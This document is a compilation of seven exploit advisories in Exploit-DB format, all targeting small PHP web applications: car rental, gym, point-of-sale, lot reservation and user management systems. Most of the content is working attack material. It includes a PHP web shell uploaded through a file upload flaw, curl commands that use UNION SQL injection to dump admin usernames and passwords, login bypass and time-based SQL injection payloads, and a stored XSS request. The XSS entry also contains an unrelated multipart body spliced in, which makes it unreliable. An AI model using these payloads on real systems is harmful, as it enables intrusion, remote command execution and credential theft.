# Exploit Title: Car Rental Management System 1.0 - Arbitrary File Upload # Date: 22-10-2020 # Exploit Author: Jyotsna Adhana and Saurav Shukla # Vendor Homepage: https://www.sourcecodester.com/php/14544/car-rental-management-system-using-phpmysqli-source-code.html # Software Link: https://www.sourcecodester.com/download-code?nid=14544&title=Car+Rental+Management+System+using+PHP%2FMySQLi+with+Source+Code # Version: 1.0 # Tested On: Windows 10 Pro 10.0.18363 N/A Build 18363 + XAMPP V3.2.4 #Vulnerable Page: http://localhost/carRental/admin/index.php?page=manage_car #Exploit Fill details Create php shell code with below script <?php if(isset($_REQUEST['cmd'])){ echo "<pre>"; $cmd = ($_REQUEST['cmd']); system($cmd); echo "</pre>"; die; }?> Click on Browse Select php file Click Save Access below URL: http://localhost/carRental/admin/assets/uploads/cars_img/1603387740_backdoor.php?cmd=sysinfo add system commands after cmd to execute it.

# Exploit Title: User Registration & Login and User Management System 2.1 - SQL Injection # Dork: N/A # Date: 2020-10-22 # Exploit Author: Ihsan Sencan # Vendor Homepage: https://phpgurukul.com # Software Link: https://phpgurukul.com/user-registration-login-and-user-management-system-with-admin-panel/ # Version: 2.1 # Tested on: Linux # CVE: N/A # POC: # 1) # curl -k "http://localhost/admin/update-profile.php?uid=-1' union select 1,(SELECT+GROUP_CONCAT(0x5b,0x49443a20,id,0x205d205b20,0x557365726e616d653a20,username,0x205d205b20,0x50617373776f72643a20,password,0x5d+SEPARATOR+0x3c62723e)+FROM+admin),3,4,5,6,7-- -" | grep fname curl -k "http://localhost/admin/update-profile.php?uid=-1' union select 1,2,(SELECT+GROUP_CONCAT(0x5b,0x49443a20,id,0x205d205b20,0x557365726e616d653a20,username,0x205d205b20,0x50617373776f72643a20,password,0x5d+SEPARATOR+0x3c62723e)+FROM+admin),4,5,6,7-- -" | grep lname curl -k "http://localhost/admin/update-profile.php?uid=-1' union select 1,2,3,(SELECT+GROUP_CONCAT(0x5b,0x49443a20,id,0x205d205b20,0x557365726e616d653a20,username,0x205d205b20,0x50617373776f72643a20,password,0x5d+SEPARATOR+0x3c62723e)+FROM+admin),5,6,7-- -" | grep email curl -k "http://localhost/admin/update-profile.php?uid=-1' union select 1,2,3,4,5,(SELECT+GROUP_CONCAT(0x5b,0x49443a20,id,0x205d205b20,0x557365726e616d653a20,username,0x205d205b20,0x50617373776f72643a20,password,0x5d+SEPARATOR+0x3c62723e)+FROM+admin),7-- -" | grep contact # # <input type="text" class="form-control" name="fname" value="[ID: 1 ] [ Username: xxx ] [ Password: xxx]" > #

#Exploit Title: Point of Sales 1.0 - SQL Injection #Date: 2020-10-22 #Exploit Author: Ankita Pal #Vendor Homepage: https://www.sourcecodester.com/php/14540/point-sales-phppdo-full-source-code-2020.html #Software Link: https://www.sourcecodester.com/sites/default/files/download/janobe/pos_0.zip #Version: V1.0 #Tested on: Windows 10 + xampp v3.2.4 Proof of Concept::: Step 1: Open the URL http://localhost:8081/pos/edit_category.php?id=1 Step 2: Change the URL http://localhost:8081/pos/edit_category.php?id=1' Step 3: Try to balance the query http://localhost:8081/pos/edit_category.php?id=1'--+ Step 4: Find the number of columns http://localhost:8081/pos/edit_category.php?id=1' order by 1,2--+ Step 5: Find which columns are visible http://localhost:8081/pos/edit_category.php?id=-1%27%20UNION%20Select%201,2--+ Malicious Request::: GET /pos/edit_category.php?id=-1%27%20UNION%20Select%201,database()--+ HTTP/1.1 Host: localhost:8081 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101 Firefox/81.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-GB,en;q=0.5 Accept-Encoding: gzip, deflate Connection: close Cookie: PHPSESSID=q9kusr41d3em013kbe98b701id Upgrade-Insecure-Requests: 1 Gives database name *sourcecodester_posdb*

#Exploit Title: lot reservation management system 1.0 - Authentication Bypass #Date: 2020-10-22 #Exploit Author: Ankita Pal #Vendor Homepage: https://www.sourcecodester.com/php/14530/lot-reservation-management-system-using-phpmysqli-source-code.html #Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/lot-reservation-management-system.zip #Version: V1.0 #Tested on: Windows 10 + xampp v3.2.4 Proof of Concept::: Step 1: Open the URL http://localhost:8081/lot-reservation-management-system/admin/login.php Step 2: use payload ' or 1=1 limit 1 -- -+ for both username and password. Malicious Request::: POST /lot-reservation-management-system/admin/ajax.php?action=login HTTP/1.1 Host: localhost:8081 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101 Firefox/81.0 Accept: */* Accept-Language: en-GB,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 71 Origin: http://localhost:8081 Connection: close Referer: http://localhost:8081/lot-reservation-management-system/admin/login.php Cookie: PHPSESSID=q9kusr41d3em013kbe98b701id username='+or+1%3D1+limit+1+--+-%2B&password='+or+1%3D1+limit+1+--+-%2B You will be login as admin of the application.

# Exploit Title: Gym Management System 1.0 - 'id' SQL Injection # Date: 22/10/2020 # Exploit Author: Jyotsna Adhana # Vendor Homepage: https://www.sourcecodester.com/php/14541/gym-management-system-using-phpmysqli-source-code.html # Software Link: https://www.sourcecodester.com/download-code?nid=14541&title=Gym+Management+System+using+PHP%2FMySQLi+with+Source+Code # Version: 1.0 # Tested On: Windows 10 Pro 10.0.18363 N/A Build 18363 + XAMPP V3.2.4 #parameter Vulnerable: id # Injected Request GET /gym/gym/manage_user.php?id=-1+UNION+ALL+SELECT+NULL,GROUP_CONCAT(database(),version()),NULL,NULL,NULL-- HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101 Firefox/81.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate X-Requested-With: XMLHttpRequest Connection: close Referer: http://localhost/gym/gym/index.php?page=users Cookie: PHPSESSID=7lojvad06l803amt3f7hp7o8re //Comment Above request will print database name and MariaDB version.

#Exploit Title: lot reservation management system 1.0 - Stored Cross Site Scripting #Date: 2020-10-22 #Exploit Author: Ankita Pal #Vendor Homepage: https://www.sourcecodester.com/php/14530/lot-reservation-management-system-using-phpmysqli-source-code.html #Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/lot-reservation-management-system.zip #Version: 1.0 #Tested on: Windows 10 + xampp v3.2.4 Proof of Concept::: Step 1: http://localhost:8081/lot-reservation-management-system/admin/index.php?page=divisions Step 2: Use payload <script>alert("XSS")</script> in Name and Discription. Malicious Request::: POST /lot-reservation-management-system/admin/ajax.php?action=save_division HTTP/1.1 Host: localhost:8081 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101 Firefox/81.0 Accept: */* Accept-Language: en-GB,en;q=0.5 Accept-Encoding: gzip, deflate X-Requested-With: XMLHttpRequest Content-Type: multipart/form-data; boundary=---------------------------65714323539404637092301409097 Content-Length: 613 Origin: http://localhost:8081 Connection: close Referer: http://localhost:8081/lot-reservation-management-system/admin/index.php?page=divisions Cookie: PHPSESSID=q9kusr41d3em013kbe98b701id -----------------------------65714323539404637092301409097 Content-Disposition: form-data; name="id" -----------------------------65714323539404637092301409097 Content-Disposition: form-data; name="name" <script>alert("XSS")</script> -----------------------------65714323539404637092301409097 Content-Disposition: form-data; name="description" <script>alert("XSS")</script> -----------------------------65714323539404637092301409097 Content-Disposition: form-data; name="img"; filename="" Content-Type: application/octet-stream -----------------------------65714323539404637092301409097-- -----------------------------3267707159765331982713791736 Content-Disposition: form-data; name="gender" Female -----------------------------3267707159765331982713791736 Content-Disposition: form-data; name="contact" 9876543211 -----------------------------3267707159765331982713791736 Content-Disposition: form-data; name="nid" 12 -----------------------------3267707159765331982713791736 Content-Disposition: form-data; name="address" Gujarat -----------------------------3267707159765331982713791736 Content-Disposition: form-data; name="dept" CS -----------------------------3267707159765331982713791736 Content-Disposition: form-data; name="degree" BE -----------------------------3267707159765331982713791736 Content-Disposition: form-data; name="salary" -----------------------------3267707159765331982713791736 Content-Disposition: form-data; name="file"; filename="" Content-Type: application/octet-stream -----------------------------3267707159765331982713791736-- Cookie will be reflected on View Employee.

# Exploit Title: Point of Sales 1.0 - 'username' SQL Injection # Date: 22/10/2020 # Exploit Author: Jyotsna Adhana # Vendor Homepage: https://www.sourcecodester.com/php/14540/point-sales-phppdo-full-source-code-2020.html # Software Link: https://www.sourcecodester.com/download-code?nid=14540&title=Point+of+Sales+in+PHP%2FPDO+with+Full+Source+Code+%282020%29 # Version: 1.0 # Tested On: Windows 10 Pro 10.0.18363 N/A Build 18363 + XAMPP V3.2.4 #parameter Vulnerable: username # Injected Request POST /pos/pos/ HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101 Firefox/81.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 81 Origin: http://localhost Connection: close Referer: http://localhost/pos/pos/ Cookie: PHPSESSID=7lojvad06l803amt3f7hp7o8re; laravel_session=eyJpdiI6IlBXakg2NzB1cVBEWVZtemIwVzZ6NVE9PSIsInZhbHVlIjoiU2dsaTN1alRCXC9cL1I5dnNzRDlPRDlXTDZ4UUFiakhlN0JLVzB4MnpOVVZibnpISDNFS1k3YjdzWWM2UWRzVEZyIiwibWFjIjoiZGRmODE1NGFhN2JhY2U2NTNhOWU1MzViMjFjYWExM2UzNzYwN2QzZDZmNDQwNjcyMjA1MjJiYTI2NDU2Y2Q1MSJ9; XSRF-TOKEN=eyJpdiI6IlBSMFVNT3NoYkNNVTRpQzNDRHNDNXc9PSIsInZhbHVlIjoiSmF2WXRabHhCZHNZdVlmd1RGeU1pakdoT2JQaWdvcFgzK1QzeFJ6YzRiVGZ5VGdMcmp6SlMrbVl4cnZucG9OZSIsIm1hYyI6Ijc2NzA5MjYzM2E2NjgwMWZlZmFlM2JlOTI2ZmI2YTA3NmE2M2FiYjdlN2E2NzI1NmVhZjA2N2FmOTgwOTlkZGUifQ%3D%3D Upgrade-Insecure-Requests: 1 username=admin' or '1'='1';SELECT SLEEP(5)#&password=admin' or '1'='1#&btn_login= //Comment The reponse will be delayed by 5s.